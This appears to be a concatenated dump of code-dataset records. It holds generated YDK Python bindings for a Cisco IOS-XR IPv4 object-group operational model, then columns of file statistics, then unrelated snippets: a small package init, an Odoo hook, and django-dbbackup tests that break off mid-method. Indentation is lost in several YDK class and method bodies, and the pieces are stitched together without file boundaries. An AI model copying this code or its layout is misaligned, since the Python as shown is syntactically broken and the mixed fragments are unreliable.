    self._perform_setattr(ObjectGroup.Network.Ipv4, leaf_names, name, value)
class Objects(_Entity_):
"""
Table of Object
.. attribute:: object
IPv4 object group
**type**\: list of :py:class:`Object <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    # Generated initializer for the "objects" table -- keep assignment
    # order; _is_frozen last.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(ObjectGroup.Network.Ipv4.Objects, self).__init__()

    self.yang_name = "objects"
    self.yang_parent_name = "ipv4"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("object", ("object", ObjectGroup.Network.Ipv4.Objects.Object))])
    self._leafs = OrderedDict()

    # YANG list "object": entries are Object instances.
    self.object = YList(self)
    self._segment_path = lambda: "objects"
    self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv4/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    """Intercept attribute writes and route them through YDK's guarded setter."""
    leaf_names = []
    self._perform_setattr(ObjectGroup.Network.Ipv4.Objects, leaf_names, name, value)
class Object(_Entity_):
"""
IPv4 object group
.. attribute:: object_name (key)
IPv4 object group name \- maximum 64 characters
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_groups
Table of NestedGroup
**type**\: :py:class:`NestedGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups>`
**config**\: False
.. attribute:: addresses
Table of Address
**type**\: :py:class:`Addresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Addresses>`
**config**\: False
.. attribute:: address_ranges
Table of AddressRange
**type**\: :py:class:`AddressRanges <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges>`
**config**\: False
.. attribute:: parent_groups
Table of parent object group
**type**\: :py:class:`ParentGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups>`
**config**\: False
.. attribute:: hosts
Table of Host
**type**\: :py:class:`Hosts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Hosts>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    # Generated initializer for an IPv4 object-group "object" list entry.
    # Keep assignment order: _leafs/_child_classes are populated before the
    # attribute assignments below, and _is_frozen is last (it appears to
    # gate further attribute creation via __setattr__ -- TODO confirm).
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(ObjectGroup.Network.Ipv4.Objects.Object, self).__init__()

    self.yang_name = "object"
    self.yang_parent_name = "objects"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = ['object_name']
    self._child_classes = OrderedDict([("nested-groups", ("nested_groups", ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups)), ("addresses", ("addresses", ObjectGroup.Network.Ipv4.Objects.Object.Addresses)), ("address-ranges", ("address_ranges", ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges)), ("parent-groups", ("parent_groups", ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups)), ("hosts", ("hosts", ObjectGroup.Network.Ipv4.Objects.Object.Hosts))])
    self._leafs = OrderedDict([
        ('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
    ])
    # List key leaf (object-name).
    self.object_name = None

    # Child containers, each parented to this entry and registered in the
    # python-name -> yang-name map.
    self.nested_groups = ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups()
    self.nested_groups.parent = self
    self._children_name_map["nested_groups"] = "nested-groups"

    self.addresses = ObjectGroup.Network.Ipv4.Objects.Object.Addresses()
    self.addresses.parent = self
    self._children_name_map["addresses"] = "addresses"

    self.address_ranges = ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges()
    self.address_ranges.parent = self
    self._children_name_map["address_ranges"] = "address-ranges"

    self.parent_groups = ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups()
    self.parent_groups.parent = self
    self._children_name_map["parent_groups"] = "parent-groups"

    self.hosts = ObjectGroup.Network.Ipv4.Objects.Object.Hosts()
    self.hosts.parent = self
    self._children_name_map["hosts"] = "hosts"

    # XPath segment keyed on the list-key leaf object-name.
    self._segment_path = lambda: "object" + "[object-name='" + str(self.object_name) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv4/objects/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    """Intercept attribute writes and route them through YDK's guarded setter."""
    leaf_names = ['object_name']
    self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object, leaf_names, name, value)
class NestedGroups(_Entity_):
    """
    Table of NestedGroup

    .. attribute:: nested_group

        Nested object group

        **type**\: list of :py:class:`NestedGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups, self).__init__()

        self.yang_name = "nested-groups"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("nested-group", ("nested_group", ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup))])
        self._leafs = OrderedDict()

        # YANG list "nested-group": entries are NestedGroup instances.
        self.nested_group = YList(self)
        self._segment_path = lambda: "nested-groups"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups, [], name, value)


    class NestedGroup(_Entity_):
        """
        Nested object group

        .. attribute:: nested_group_name (key)

            Nested object group

            **type**\: str

            **length:** 1..64

            **config**\: False

        .. attribute:: nested_group_name_xr

            Nested group

            **type**\: str

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup, self).__init__()

            self.yang_name = "nested-group"
            self.yang_parent_name = "nested-groups"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['nested_group_name']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('nested_group_name', (YLeaf(YType.str, 'nested-group-name'), ['str'])),
                ('nested_group_name_xr', (YLeaf(YType.str, 'nested-group-name-xr'), ['str'])),
            ])
            self.nested_group_name = None
            self.nested_group_name_xr = None
            # XPath segment keyed on the list-key leaf nested-group-name.
            self._segment_path = lambda: "nested-group" + "[nested-group-name='" + str(self.nested_group_name) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup, ['nested_group_name', 'nested_group_name_xr'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups']['meta_info']
class Addresses(_Entity_):
    """
    Table of Address

    .. attribute:: address

        IPv4 address

        **type**\: list of :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv4.Objects.Object.Addresses, self).__init__()

        self.yang_name = "addresses"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("address", ("address", ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address))])
        self._leafs = OrderedDict()

        # YANG list "address": keyless list of Address entries.
        self.address = YList(self)
        self._segment_path = lambda: "addresses"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Addresses, [], name, value)


    class Address(_Entity_):
        """
        IPv4 address

        .. attribute:: prefix

            IPv4 address/prefix

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: prefix_length

            Prefix of the IP Address

            **type**\: int

            **range:** 0..32

            **config**\: False

        .. attribute:: prefix_xr

            IPv4 Address

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: prefix_length_xr

            Prefix length

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address, self).__init__()

            self.yang_name = "address"
            self.yang_parent_name = "addresses"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
                ('prefix_xr', (YLeaf(YType.str, 'prefix-xr'), ['str'])),
                ('prefix_length_xr', (YLeaf(YType.uint32, 'prefix-length-xr'), ['int'])),
            ])
            self.prefix = None
            self.prefix_length = None
            self.prefix_xr = None
            self.prefix_length_xr = None
            self._segment_path = lambda: "address"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address, ['prefix', 'prefix_length', 'prefix_xr', 'prefix_length_xr'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Addresses']['meta_info']
class AddressRanges(_Entity_):
    """
    Table of AddressRange

    .. attribute:: address_range

        Range of host addresses

        **type**\: list of :py:class:`AddressRange <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges, self).__init__()

        self.yang_name = "address-ranges"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("address-range", ("address_range", ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange))])
        self._leafs = OrderedDict()

        # YANG list "address-range": keyless list of AddressRange entries.
        self.address_range = YList(self)
        self._segment_path = lambda: "address-ranges"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges, [], name, value)


    class AddressRange(_Entity_):
        """
        Range of host addresses

        .. attribute:: start_address

            IPv4 address

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: end_address

            IPv4 address

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: start_address_xr

            Range start address

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: end_address_xr

            Range end address

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange, self).__init__()

            self.yang_name = "address-range"
            self.yang_parent_name = "address-ranges"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('start_address', (YLeaf(YType.str, 'start-address'), ['str'])),
                ('end_address', (YLeaf(YType.str, 'end-address'), ['str'])),
                ('start_address_xr', (YLeaf(YType.str, 'start-address-xr'), ['str'])),
                ('end_address_xr', (YLeaf(YType.str, 'end-address-xr'), ['str'])),
            ])
            self.start_address = None
            self.end_address = None
            self.start_address_xr = None
            self.end_address_xr = None
            self._segment_path = lambda: "address-range"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange, ['start_address', 'end_address', 'start_address_xr', 'end_address_xr'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges']['meta_info']
class ParentGroups(_Entity_):
    """
    Table of parent object group

    .. attribute:: parent_group

        Parent object group

        **type**\: list of :py:class:`ParentGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups, self).__init__()

        self.yang_name = "parent-groups"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("parent-group", ("parent_group", ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup))])
        self._leafs = OrderedDict()

        # YANG list "parent-group": entries are ParentGroup instances.
        self.parent_group = YList(self)
        self._segment_path = lambda: "parent-groups"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups, [], name, value)


    class ParentGroup(_Entity_):
        """
        Parent object group

        .. attribute:: parent_group_name (key)

            Nested object group

            **type**\: str

            **length:** 1..64

            **config**\: False

        .. attribute:: parent_name

            Parent node

            **type**\: str

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup, self).__init__()

            self.yang_name = "parent-group"
            self.yang_parent_name = "parent-groups"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['parent_group_name']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('parent_group_name', (YLeaf(YType.str, 'parent-group-name'), ['str'])),
                ('parent_name', (YLeaf(YType.str, 'parent-name'), ['str'])),
            ])
            self.parent_group_name = None
            self.parent_name = None
            # XPath segment keyed on the list-key leaf parent-group-name.
            self._segment_path = lambda: "parent-group" + "[parent-group-name='" + str(self.parent_group_name) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup, ['parent_group_name', 'parent_name'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups']['meta_info']
class Hosts(_Entity_):
"""
Table of Host
.. attribute:: host
A single host address
**type**\: list of :py:class:`Host <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.Hosts, self).__init__()
self.yang_name = "hosts"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("host", ("host", ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host))])
self._leafs = OrderedDict()
self.host = YList(self)
self._segment_path = lambda: "hosts"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Hosts, [], name, value)
class Host(_Entity_):
"""
A single host address
.. attribute:: host_address (key)
Host ipv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: host_address_xr
Host address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host, self).__init__()
self.yang_name = "host"
self.yang_parent_name = "hosts"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['host_address']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('host_address', (YLeaf(YType.str, 'host-address'), ['str'])),
('host_address_xr', (YLeaf(YType.str, 'host-address-xr'), ['str'])),
])
self.host_address = None
self.host_address_xr = None
self._segment_path = lambda: "host" + "[host-address='" + str(self.host_address) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host, ['host_address', 'host_address_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Hosts']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network']['meta_info']
def clone_ptr(self):
self._top_entity = ObjectGroup()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup']['meta_info']
| 40.301456
| 488
| 0.437668
| 10,650
| 121,791
| 4.723099
| 0.029296
| 0.030536
| 0.03817
| 0.030715
| 0.944415
| 0.932049
| 0.917954
| 0.904932
| 0.889525
| 0.884038
| 0
| 0.033118
| 0.453827
| 121,791
| 3,021
| 489
| 40.314796
| 0.723072
| 0.201329
| 0
| 0.790717
| 0
| 0.004072
| 0.112477
| 0.032497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099349
| false
| 0
| 0.041531
| 0
| 0.299674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
075cfb092c585adc98ff2da4ee61baf23289dea2
| 134
|
py
|
Python
|
nami/datasets/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | 2
|
2020-08-03T10:37:45.000Z
|
2020-10-11T14:55:05.000Z
|
nami/datasets/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
nami/datasets/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
from nami.datasets.ImageNet import get_nounids
from nami.datasets.ImageNet import get_dataset
from nami.datasets.kme import load_data
| 33.5
| 46
| 0.865672
| 21
| 134
| 5.380952
| 0.52381
| 0.212389
| 0.424779
| 0.424779
| 0.584071
| 0.584071
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089552
| 134
| 3
| 47
| 44.666667
| 0.92623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ab1f83113bd231ecbf2157f70e17c31981fa8fde
| 40
|
py
|
Python
|
base_session_store_psql/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | null | null | null |
base_session_store_psql/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | 1
|
2020-05-03T04:27:29.000Z
|
2020-05-03T04:27:29.000Z
|
base_session_store_psql/__init__.py
|
eneldoserrata/misc-addons
|
6f3b94d8a71d603d9ad449f96edfc66385e78080
|
[
"MIT"
] | 2
|
2020-05-09T02:08:59.000Z
|
2022-03-21T06:37:15.000Z
|
def post_load():
from . import http
| 13.333333
| 22
| 0.65
| 6
| 40
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 40
| 2
| 23
| 20
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab246271c210490a762ddc4ad1285a316ca2ba1f
| 6,371
|
py
|
Python
|
dbbackup/tests/functional/test_commands.py
|
amolinaalvarez/django-dbbackup
|
9316ed14d3b4be18662fa5fd24f124a5d6014c8e
|
[
"BSD-3-Clause"
] | null | null | null |
dbbackup/tests/functional/test_commands.py
|
amolinaalvarez/django-dbbackup
|
9316ed14d3b4be18662fa5fd24f124a5d6014c8e
|
[
"BSD-3-Clause"
] | null | null | null |
dbbackup/tests/functional/test_commands.py
|
amolinaalvarez/django-dbbackup
|
9316ed14d3b4be18662fa5fd24f124a5d6014c8e
|
[
"BSD-3-Clause"
] | 1
|
2018-10-08T20:37:35.000Z
|
2018-10-08T20:37:35.000Z
|
from mock import patch
from django.test import TransactionTestCase as TestCase
from django.core.management import execute_from_command_line
from dbbackup.tests.utils import (TEST_DATABASE, HANDLED_FILES,
clean_gpg_keys, add_public_gpg,
add_private_gpg, get_dump,
get_dump_name)
from dbbackup.tests.testapp import models
@patch('django.conf.settings.DATABASES', {'default': TEST_DATABASE})
@patch('dbbackup.settings.STORAGE', 'dbbackup.tests.utils')
class DbBackupCommandTest(TestCase):
def setUp(self):
HANDLED_FILES.clean()
add_public_gpg()
open(TEST_DATABASE['NAME'], 'a').close()
self.instance = models.CharModel.objects.create(field='foo')
def tearDown(self):
clean_gpg_keys()
def test_encrypt(self):
argv = ['', 'dbbackup', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue(filename.endswith('.gpg'))
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
def test_compress(self):
argv = ['', 'dbbackup', '--compress']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue(filename.endswith('.gz'))
def test_compress_and_encrypt(self):
argv = ['', 'dbbackup', '--compress', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue(filename.endswith('.gz.gpg'))
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
@patch('django.conf.settings.DATABASES', {'default': TEST_DATABASE})
@patch('dbbackup.settings.STORAGE', 'dbbackup.tests.utils')
@patch('dbbackup.management.commands.dbrestore.input', return_value='y')
class DbRestoreCommandTest(TestCase):
def setUp(self):
HANDLED_FILES.clean()
add_public_gpg()
add_private_gpg()
open(TEST_DATABASE['NAME'], 'a').close()
self.instance = models.CharModel.objects.create(field='foo')
def tearDown(self):
clean_gpg_keys()
def test_restore(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup'])
self.instance.delete()
# Restore
execute_from_command_line(['', 'dbrestore'])
restored = models.CharModel.objects.all().exists()
self.assertTrue(restored)
@patch('dbbackup.utils.getpass', return_value=None)
def test_encrypted(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup', '--encrypt'])
self.instance.delete()
# Restore
execute_from_command_line(['', 'dbrestore', '--decrypt'])
restored = models.CharModel.objects.all().exists()
